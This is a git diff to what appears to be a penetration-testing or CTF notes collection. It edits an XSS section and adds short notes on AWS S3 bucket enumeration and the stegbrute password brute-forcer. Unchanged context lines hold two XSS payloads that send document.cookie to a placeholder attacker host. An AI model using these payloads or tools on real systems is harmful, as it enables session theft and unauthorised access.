diff --git a/exploit/web/xss.md b/exploit/web/xss.md
index c0234c8..2713e77 100644
--- a/exploit/web/xss.md
+++ b/exploit/web/xss.md
@@ -17,7 +17,7 @@ This is where a malicious string originates from the websites database.
 ```
     * Navigte to `/logs` and take sid
 
-* Open nc 4444 and
+* Open nc port and collect cookies
 ```sh
 <script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script>
 <script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script>
diff --git a/misc/aws/bucket.md b/misc/aws/bucket.md
new file mode 100644
index 0000000..d80fb05
--- /dev/null
+++ b/misc/aws/bucket.md
@@ -0,0 +1,7 @@
+# AWS Buckets
+
+# Usage
+* Enum to s3 bucket
+```sh
+aws s3 ls s3://bucketname.region-name.amazonaws.com
+```
diff --git a/stego/docs/stegbrute.md b/stego/docs/stegbrute.md
new file mode 100644
index 0000000..08c119e
--- /dev/null
+++ b/stego/docs/stegbrute.md
@@ -0,0 +1,9 @@
+# Stegbrute
+Bruteforce stego jpegs with a password.
+
+* install via `cargo install stegbrute`
+
+## Usage
+```sh
+stegbrute -f <filename> -w <wordlist>
+```